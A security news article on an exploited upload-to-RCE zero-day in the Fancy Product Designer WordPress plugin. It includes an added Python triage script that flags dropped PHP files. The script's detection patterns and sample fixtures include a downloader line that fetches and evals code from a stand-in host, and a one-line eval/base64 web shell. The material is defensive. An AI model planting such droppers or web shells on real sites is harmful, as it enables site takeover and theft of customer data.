Websites using Fancy Product Designer are vulnerable to remote code execution attacks even when the plugin is deactivated
Cybercriminals have been actively exploiting a zero-day vulnerability in Fancy Product Designer, a WordPress plugin used by more than 17,000 websites, according to a blog post by Defiant, the company that makes the Wordfence security plugins for the web publishing platform.
Attackers have been observed using the zero-day to deliver malware to sites with the plugin installed. There is evidence indicating that the security flaw, which can be abused for full site takeover, was exploited as early as January 30th of this year.
The plugin lets customers customize any kind of product, from clothing to accessories and household items, by uploading their own images or PDF files. It is used on a variety of platforms, including WordPress, WooCommerce and Shopify.
“Unfortunately, while the plugin had some checks in place to prevent malicious files from being uploaded, these checks were insufficient and could easily be bypassed, allowing attackers to upload executable PHP files to any site with the plugin installed. This effectively made it possible for any attacker to achieve Remote Code Execution on an impacted site, allowing full site takeover,” warned Wordfence QA Engineer Ram Gall.
Based on Defiant’s analysis, the majority of the attacks appear to come from three specific IP addresses. The attackers are targeting e-commerce sites with the aim of getting their hands on order information from the vendor’s databases. The data that could be extracted from these orders may include customers’ personally identifiable information, which could spell trouble for site operators since it puts them at risk of violating PCI DSS (Payment Card Industry Data Security Standard) compliance rules.
Per the PCI Compliance Guide, penalties for non-compliance can range from US$5,000 up to US$100,000 per month. On that note, it is also worth mentioning that if the site handles the data of EU residents and their information is exposed, the business would run afoul of the European Union’s General Data Protection Regulation (GDPR), which can also bring hefty fines.
According to the report, if an attack is successful, several files will appear in either the wp-admin or wp-content/plugins subfolder, with an initial payload delivered that is then used to retrieve additional malware from another site.
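The report gives a location-based indicator (PHP files appearing under wp-admin or wp-content/plugins) and a behaviour (a first-stage payload that fetches more malware from elsewhere). The following is an added triage script for this article, not part of the Wordfence report: it walks those two directories and flags PHP files that were modified after a cutoff or that contain assumed downloader/dropper markers. Modification time alone is not trusted, because a dropped file can be trivially back-dated, so the content check is what catches the time-stomped case. The marker regexes, the sample tree and the file names in it are constructed for the example.

```python
"""Triage scan for dropped PHP files under wp-admin and wp-content/plugins
(added example, not the report's tooling)."""
import os
import re
import tempfile
import time
from typing import Dict, List, Tuple

# The two locations the report names as where dropped files appear.
SCAN_DIRS = ("wp-admin", os.path.join("wp-content", "plugins"))

# Assumed generic heuristics for a stage-one downloader or dropper.
MARKERS = [
    ("remote fetch", re.compile(rb"file_get_contents\s*\(\s*['\"]https?://", re.I)),
    ("curl_exec", re.compile(rb"curl_exec\s*\(", re.I)),
    ("eval of decoded blob", re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)", re.I)),
]


def find_suspicious_php(wp_root: str, modified_since: float) -> List[Dict]:
    """Return every .php/.phtml/.phar file under SCAN_DIRS that was modified
    after `modified_since` (Unix epoch) or that matches a marker. Each hit
    carries the path relative to wp_root and the list of reasons."""
    hits = []
    for sub in SCAN_DIRS:
        for dirpath, _, files in os.walk(os.path.join(wp_root, sub)):
            for name in files:
                if not name.lower().endswith((".php", ".phtml", ".phar")):
                    continue
                path = os.path.join(dirpath, name)
                reasons = []
                if os.path.getmtime(path) > modified_since:
                    reasons.append("modified after cutoff")
                with open(path, "rb") as fh:
                    blob = fh.read()
                for label, regex in MARKERS:
                    if regex.search(blob):
                        reasons.append("marker: " + label)
                if reasons:
                    hits.append({"path": os.path.relpath(path, wp_root), "reasons": reasons})
    return sorted(hits, key=lambda h: h["path"])


def build_sample_tree() -> Tuple[str, float]:
    """Constructed sample WordPress tree in a temp dir. Returns (root, cutoff)
    where cutoff is seven days ago; plugin names and paths are invented."""
    root = tempfile.mkdtemp(prefix="wp-")
    now = time.time()
    old, fresh, cutoff = now - 90 * 86400, now - 3600, now - 7 * 86400

    def put(rel: str, content: bytes, mtime: float) -> None:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.utime(path, (mtime, mtime))

    # Legitimate, old, benign plugin file: must not be reported.
    put("wp-content/plugins/example-plugin/example-plugin.php",
        b"<?php\n/* Plugin Name: Example Plugin */\n", old)
    # Dropped stage-one downloader with a fresh mtime: reported twice over.
    put("wp-admin/css/.cache.php",
        b"<?php $p = file_get_contents('http://example.invalid/stage2.txt'); eval($p);", fresh)
    # Time-stomped dropper: old mtime, but the content gives it away.
    put("wp-content/plugins/example-plugin/inc/x.php",
        b"<?php eval(base64_decode($_POST['c']));", old)
    # Fresh non-PHP asset: ignored.
    put("wp-content/plugins/example-plugin/js/app.js", b"// js", fresh)
    return root, cutoff


if __name__ == "__main__":
    sample_root, since = build_sample_tree()
    for hit in find_suspicious_php(sample_root, since):
        print(hit["path"], "->", ", ".join(hit["reasons"]))
```

Treat the output as a starting list for triage, not a verdict: anything flagged should be compared against a known-good copy of the plugin or the core tree (for WordPress core files, `wp core verify-checksums` from WP-CLI does that comparison), and a clean scan of these two directories says nothing about files dropped elsewhere.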
The Wordfence team notified the plugin’s developer about the vulnerability on May 31st and received a response within 24 hours. A patched version, Fancy Product Designer 4.6.9, was rolled out on June 2nd. Administrators of sites running the plugin are advised to patch it immediately, since in some configurations the vulnerability can be exploited even when the plugin itself is deactivated.